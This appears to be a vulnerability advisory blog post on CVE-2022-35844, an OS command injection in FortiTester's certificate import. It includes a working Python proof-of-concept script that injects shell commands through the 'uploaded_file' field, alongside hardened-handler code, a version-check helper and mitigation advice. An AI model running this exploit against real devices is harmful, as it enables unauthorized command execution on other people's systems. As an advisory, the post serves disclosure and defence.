A critical vulnerability (CVE-2022-35844) has been identified in FortiTester, affecting versions 2.3.0 through 3.9.1, 4.0.0 through 4.2.0, and 7.0.0 through 7.1.0. This vulnerability stems from improper neutralization of special elements used in an OS command [CWE-78] within the management interface. As a result, an authenticated attacker can potentially execute unauthorized commands via specifically crafted arguments related to the certificate import feature. This post discusses the exploit details and provides code snippets and links to the original references.

Technical Overview

The flaw lies in FortiTester's management interface, where special elements are not adequately neutralized before being placed in OS commands. This allows any authenticated user who can interact with the certificate import feature to inject arbitrary commands through the interface, leading to unauthorized command execution.

This vulnerability can be exploited by sending a specifically crafted request to the management interface with injected arguments in the commands related to the certificate import feature.

The following code snippet demonstrates the exploitation of this vulnerability in a Python script:

import requests

# Replace the placeholders with the target IP address and your credentials
TARGET_IP = 'x.x.x.x'
USERNAME = 'your_username'
PASSWORD = 'your_password'

# Authentication: log in to the JSON-RPC endpoint and keep the session token
url = f'https://{TARGET_IP}/jsonrpc'
data = {"params": [USERNAME, PASSWORD, ""], "method": "user.login", "id": 1}
response = requests.post(url, json=data, verify=False)
user_token = response.json()['result']['user_token']

# Exploit the vulnerability: the certificate import call passes the
# "uploaded_file" value into an OS command without neutralizing shell metacharacters
cmd_injection_payload = "; id"  # You can replace 'id' with any command you want to execute on the target server.
data = {
    "params": [
        user_token,
        {
            "uploaded_file": cmd_injection_payload,
            "filename": "malicious_key.pem",
            "type": "private_key"
        }
    ],
    "method": "ft.import_cert",
    "id": 2
}

response = requests.post(url, json=data, verify=False)
print(response.text)

When the above script runs against a vulnerable FortiTester instance, it will attempt to execute the injected command on the target server. In this example, the id command would be run.
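To make the CWE-78 root cause concrete from the defender's side, the following is an added example written for this post; it is not FortiTester code and makes no claim about how the real management interface invokes its tooling. It models a hypothetical certificate-import handler that receives the same parameter shape the script above sends ("uploaded_file", "filename", "type"). The vulnerable builder pastes those values into a single shell string, so a value such as "; id" becomes a second command; the hardened handler allow-lists the filename and builds an argument vector for subprocess with no shell, so metacharacters stay inert bytes inside one argument. The openssl invocation, the upload directory and the filename pattern are assumptions, and nothing is executed until run_import is called explicitly.

```python
import re
import subprocess
from pathlib import Path

# Assumed upload directory and filename allow-list (constructed for this example).
CERT_DIR = Path("/tmp/certs")
SAFE_FILENAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}\.(pem|crt|key)$")
ALLOWED_TYPES = {"private_key", "certificate"}


def build_shell_command_vulnerable(uploaded_file, filename):
    """The flawed pattern: user-controlled values are interpolated into one
    shell string. Anything the shell treats specially (';', '|', '$(...)',
    backticks) is interpreted as command syntax. Returned only, never run."""
    return f"openssl rsa -in {uploaded_file} -out {CERT_DIR}/{filename} -check"


def is_safe_filename(filename):
    """Allow-list check: a plain name with a known extension, no path
    separators, no '..', no whitespace or shell metacharacters."""
    return bool(SAFE_FILENAME.fullmatch(filename)) and ".." not in filename


def handle_import_request(params):
    """Hardened handler. Validates every field, then returns the argument
    vector that would be passed to subprocess without a shell. Each value is
    a single argv element, so '; id' can only ever be a (nonexistent) path."""
    filename = str(params.get("filename", ""))
    cert_type = str(params.get("type", ""))
    uploaded = str(params.get("uploaded_file", ""))

    if cert_type not in ALLOWED_TYPES:
        return {"status": "rejected", "reason": "unknown type"}
    if not is_safe_filename(filename):
        return {"status": "rejected", "reason": "filename outside allow-list"}
    # The uploaded content must already live under the upload directory;
    # resolve() defeats traversal such as "../../etc/passwd".
    src = (CERT_DIR / uploaded).resolve()
    if CERT_DIR.resolve() not in src.parents:
        return {"status": "rejected", "reason": "upload path outside CERT_DIR"}

    dest = CERT_DIR / filename
    argv = ["openssl", "rsa", "-in", src.as_posix(), "-out", dest.as_posix(), "-check"]
    return {"status": "ok", "argv": argv}


def run_import(argv):
    """Execute the vetted argv. shell=False (the default) means no word
    splitting, no globbing and no command separators are ever interpreted."""
    completed = subprocess.run(argv, check=False, capture_output=True)
    return completed.returncode


if __name__ == "__main__":
    # The payload from the exploit script above, handled both ways.
    print(build_shell_command_vulnerable("; id", "malicious_key.pem"))
    print(handle_import_request({"uploaded_file": "; id",
                                 "filename": "malicious_key.pem",
                                 "type": "private_key"}))
```

The important difference is not the regex but the execution model: with an argument vector there is no shell parsing step in which "; id" could become a separate command, and the allow-list on the filename keeps unexpected characters out of the destination path as well. The same split applies to any tool a management interface shells out to, not only openssl.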

For more details about the vulnerability, refer to the original advisory and the following references:

- Fortinet Advisory: FG-IR-21-067
- CVE-2022-35844
- CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Mitigation

To protect against this vulnerability, users are advised to update their FortiTester devices to the following firmware versions, as recommended by Fortinet:

For FortiTester 7.x, update to version 7.1.1 or later.

Users should also follow the principle of least privilege and limit access to commands based on the user role.
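For checking a fleet against the affected ranges stated in this post, here is an added helper, not Fortinet tooling. It encodes only the version ranges given above (2.3.0 through 3.9.1, 4.0.0 through 4.2.0, 7.0.0 through 7.1.0) and the 7.1.1 fixed release; a version outside those ranges is reported as "not listed" rather than "safe", since the post states no fixed versions for the 2.x, 3.x and 4.x branches. The version strings passed in are assumed to be of the plain X.Y.Z form.

```python
import re

# Affected ranges as stated in the advisory summary above (inclusive).
AFFECTED_RANGES = [
    ((2, 3, 0), (3, 9, 1)),
    ((4, 0, 0), (4, 2, 0)),
    ((7, 0, 0), (7, 1, 0)),
]
# Fixed release named in the mitigation section for the 7.x branch.
FIXED_7X = (7, 1, 1)

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)$")


def parse_version(text):
    """Turn 'X.Y.Z' into an integer tuple so ranges compare numerically
    (so 3.10.0 sorts after 3.9.1, which string comparison would get wrong)."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unsupported version string: {text!r}")
    return tuple(int(part) for part in m.groups())


def is_affected(text):
    """True if the version falls inside any of the published affected ranges."""
    v = parse_version(text)
    return any(low <= v <= high for low, high in AFFECTED_RANGES)


def assess(text):
    """Classify one device version for an inventory report."""
    v = parse_version(text)
    if is_affected(text):
        if v[0] == 7:
            return "affected: upgrade to 7.1.1 or later"
        return "affected: no fixed version stated for this branch, consult the advisory"
    if v[0] == 7 and v >= FIXED_7X:
        return "fixed release"
    return "not listed in the affected ranges"


def triage(inventory):
    """Map hostname -> version (constructed sample) onto hostname -> assessment."""
    return {host: assess(version) for host, version in inventory.items()}


if __name__ == "__main__":
    # Constructed sample inventory, not real devices.
    sample = {"ft-lab-01": "7.1.0", "ft-lab-02": "7.1.1", "ft-old-03": "3.9.1"}
    for host, verdict in triage(sample).items():
        print(f"{host}: {verdict}")
```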

Conclusion

The discovery of CVE-2022-35844 highlights the importance of thorough secure coding practices and monitoring for security issues in network devices like FortiTester. By updating to the latest firmware, limiting command access to appropriate users, and staying informed of new threats and vulnerabilities, organizations can better protect themselves from unauthorized command execution attacks.

Timeline

Published on: 10/18/2022 14:15:00 UTC
Last modified on: 10/20/2022 18:50:00 UTC